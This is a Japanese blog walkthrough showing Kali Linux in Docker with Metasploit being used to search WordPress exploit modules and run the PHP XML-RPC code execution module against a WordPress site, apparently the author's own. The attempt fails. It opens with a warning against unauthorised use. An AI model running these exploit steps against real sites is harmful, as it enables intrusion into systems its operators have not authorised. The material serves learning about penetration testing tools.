※記事内容を自分が管理していないシステムに許可なく実施すれば違法となるため、絶対に実施しないでください※
Docker for Windows で Kali Linuxを起動してみる後に操作している。
攻撃といっても大したことはしておらず、xmlrpcを攻撃してみただけ。
事前準備
PS C:\Users\shimizu> docker exec -it (コンテナID) /bin/bash root@81c581d5cf43:/# apt-get update && apt-get -y upgrade && apt-get install -y kali-linux-web ...(適用後に再起動する) root@81c581d5cf43:/# /etc/init.d/postgresql start Starting PostgreSQL 12 database server: main. root@81c581d5cf43:/# update-rc.d postgresql enable root@81c581d5cf43:/# msfdb init ...
Metasploitの実行
root@81c581d5cf43:/# msfconsole .;lxO0KXXXK0Oxl:. ,o0WMMMMMMMMMMMMMMMMMMKd, 'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx, :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK: .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX, lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo xMMMMMMMMMMWd. .oNMMMMMMMMMMk oMMMMMMMMMMx. dMMMMMMMMMMx .WMMMMMMMMM: :MMMMMMMMMM, xMMMMMMMMMo lMMMMMMMMMO NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc; MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX: NMMMMMMMMW. ;KMMMMMMMMMMMMMMX: xMMMMMMMMMd ,0MMMMMMMMMMK; .WMMMMMMMMMc 'OMMMMMM0, lMMMMMMMMMMk. .kMMO' dMMMMMMMMMMWd' .. cWMMMMMMMMMMMNxc'. ########## .0MMMMMMMMMMMMMMMMWc #+# #+# ;0MMMMMMMMMMMMMMMo. +:+ .dNMMMMMMMMMMMMo +#++:++#+ 'oOWMMMMMMMMo +:+ .,cdkO0K; :+: :+: :::::::+: Metasploit =[ metasploit v5.0.66-dev ] + -- --=[ 1956 exploits - 1092 auxiliary - 336 post ] + -- --=[ 558 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ]
WordPress用のexploitを検索する
msf5 > search rank:excellent wordpress Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/freebsd/local/rtld_execl_priv_esc 2009-11-30 excellent Yes FreeBSD rtld execl() Privilege Escalation 1 exploit/multi/http/wp_crop_rce 2019-02-19 excellent Yes WordPress Crop-image Shell Upload 2 exploit/multi/http/wp_db_backup_rce 2019-04-24 excellent Yes WP Database Backup RCE 3 exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload 2016-05-04 excellent Yes WordPress Ninja Forms Unauthenticated File Upload 4 exploit/multi/http/wp_responsive_thumbnail_slider_upload 2015-08-28 excellent Yes WordPress Responsive Thumbnail Slider Arbitrary File Upload 5 exploit/unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution 6 exploit/unix/webapp/jquery_file_upload 2018-10-09 excellent Yes blueimp's jQuery (Arbitrary) File Upload 7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution 8 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload 9 exploit/unix/webapp/wp_advanced_custom_fields_exec 2012-11-14 excellent Yes WordPress Plugin Advanced Custom Fields Remote File Inclusion 10 exploit/unix/webapp/wp_ajax_load_more_file_upload 2015-10-10 excellent Yes WordPress Ajax Load More PHP Upload Vulnerability 11 exploit/unix/webapp/wp_asset_manager_upload_exec 2012-05-26 excellent Yes WordPress Asset-Manager PHP File Upload Vulnerability 12 exploit/unix/webapp/wp_creativecontactform_file_upload 2014-10-22 excellent Yes WordPress Creative Contact Form Upload Vulnerability 13 exploit/unix/webapp/wp_downloadmanager_upload 2014-12-03 excellent Yes WordPress Download Manager (download-manager) Unauthenticated File Upload 14 exploit/unix/webapp/wp_easycart_unrestricted_file_upload 2015-01-08 excellent No WordPress WP EasyCart Unrestricted File Upload 15 exploit/unix/webapp/wp_foxypress_upload 2012-06-05 excellent Yes WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution 16 exploit/unix/webapp/wp_frontend_editor_file_upload 2012-07-04 excellent Yes WordPress Front-end Editor File Upload 17 exploit/unix/webapp/wp_holding_pattern_file_upload 2015-02-11 excellent Yes WordPress Holding Pattern Theme Arbitrary File Upload 18 exploit/unix/webapp/wp_inboundio_marketing_file_upload 2015-03-24 excellent Yes WordPress InBoundio Marketing PHP Upload Vulnerability 19 exploit/unix/webapp/wp_infusionsoft_upload 2014-09-25 excellent Yes WordPress InfusionSoft Upload Vulnerability 20 exploit/unix/webapp/wp_lastpost_exec 2005-08-09 excellent No WordPress cache_lastpostdate Arbitrary Code Execution 21 exploit/unix/webapp/wp_mobile_detector_upload_execute 2016-05-31 excellent Yes WordPress WP Mobile Detector 3.5 Shell Upload 22 exploit/unix/webapp/wp_nmediawebsite_file_upload 2015-04-12 excellent Yes WordPress N-Media Website Contact Form Upload Vulnerability 23 exploit/unix/webapp/wp_optimizepress_upload 2013-11-29 excellent Yes WordPress OptimizePress Theme File Upload Vulnerability 24 exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload 2014-11-11 excellent Yes WordPress Photo Gallery Unrestricted File Upload 25 exploit/unix/webapp/wp_pixabay_images_upload 2015-01-19 excellent Yes WordPress Pixabay Images PHP Code Upload 26 exploit/unix/webapp/wp_plainview_activity_monitor_rce 2018-08-26 excellent Yes WordPress Plainview Activity Monitor RCE 27 exploit/unix/webapp/wp_platform_exec 2015-01-21 excellent No WordPress Platform Theme File Upload Vulnerability 28 exploit/unix/webapp/wp_property_upload_exec 2012-03-26 excellent Yes WordPress WP-Property PHP File Upload Vulnerability 29 exploit/unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent Yes WordPress Reflex Gallery Upload Vulnerability 30 exploit/unix/webapp/wp_revslider_upload_execute 2014-11-26 excellent Yes WordPress RevSlider File Upload and Execute Vulnerability 31 exploit/unix/webapp/wp_slideshowgallery_upload 2014-08-28 excellent Yes WordPress SlideShow Gallery Authenticated File Upload 32 exploit/unix/webapp/wp_symposium_shell_upload 2014-12-11 excellent Yes WordPress WP Symposium 14.11 Shell Upload 33 exploit/unix/webapp/wp_total_cache_exec 2013-04-17 excellent Yes WordPress W3 Total Cache PHP Code Execution 34 exploit/unix/webapp/wp_worktheflow_upload 2015-03-14 excellent Yes WordPress Work The Flow Upload Vulnerability 35 exploit/unix/webapp/wp_wpshop_ecommerce_file_upload 2015-03-09 excellent Yes WordPress WPshop eCommerce Arbitrary File Upload Vulnerability 36 exploit/unix/webapp/wp_wptouch_file_upload 2014-07-14 excellent Yes WordPress WPTouch Authenticated File Upload 37 exploit/unix/webapp/wp_wysija_newsletters_upload 2014-07-01 excellent Yes WordPress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload 38 exploit/windows/fileformat/ms12_005 2012-01-10 excellent No MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability 39 exploit/windows/fileformat/winrar_name_spoofing 2009-09-28 excellent No WinRAR Filename Spoofing
php_xmlrpc_evalを選択して、情報表示する
msf5 > use exploit/unix/webapp/php_xmlrpc_eval msf5 exploit(unix/webapp/php_xmlrpc_eval) > info Name: PHP XML-RPC Arbitrary Code Execution Module: exploit/unix/webapp/php_xmlrpc_eval Platform: Unix Arch: cmd Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2005-06-29 Provided by: hdm <x@hdm.io> cazz <bmc@shmoo.com> Available targets: Id Name -- ---- 0 Automatic Check supported: Yes Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PATH /xmlrpc.php yes Path to xmlrpc.php Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Payload information: Space: 512 Description: This module exploits an arbitrary code execution flaw discovered in many implementations of the PHP XML-RPC module. This flaw is exploitable through a number of PHP web applications, including but not limited to Drupal, WordPress, Postnuke, and TikiWiki. References: https://cvedetails.com/cve/CVE-2005-1921/ OSVDB (17793) http://www.securityfocus.com/bid/14088
オプションを選択して、実行する
今回のWordPressに脆弱性はないため、exploitは失敗する。
msf5 exploit(unix/webapp/php_xmlrpc_eval) > set RHOSTS tech.akat.info RHOSTS => tech.akat.info msf5 exploit(unix/webapp/php_xmlrpc_eval) > set RPORT 443 RPORT => 443 msf5 exploit(unix/webapp/php_xmlrpc_eval) > set SSL true SSL => true msf5 exploit(unix/webapp/php_xmlrpc_eval) > show options Module options (exploit/unix/webapp/php_xmlrpc_eval): Name Current Setting Required Description ---- --------------- -------- ----------- PATH /xmlrpc.php yes Path to xmlrpc.php Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS tech.akat.info yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(unix/webapp/php_xmlrpc_eval) > exploit ... [-] exploit failed: no response [*] Exploit completed, but no session was created.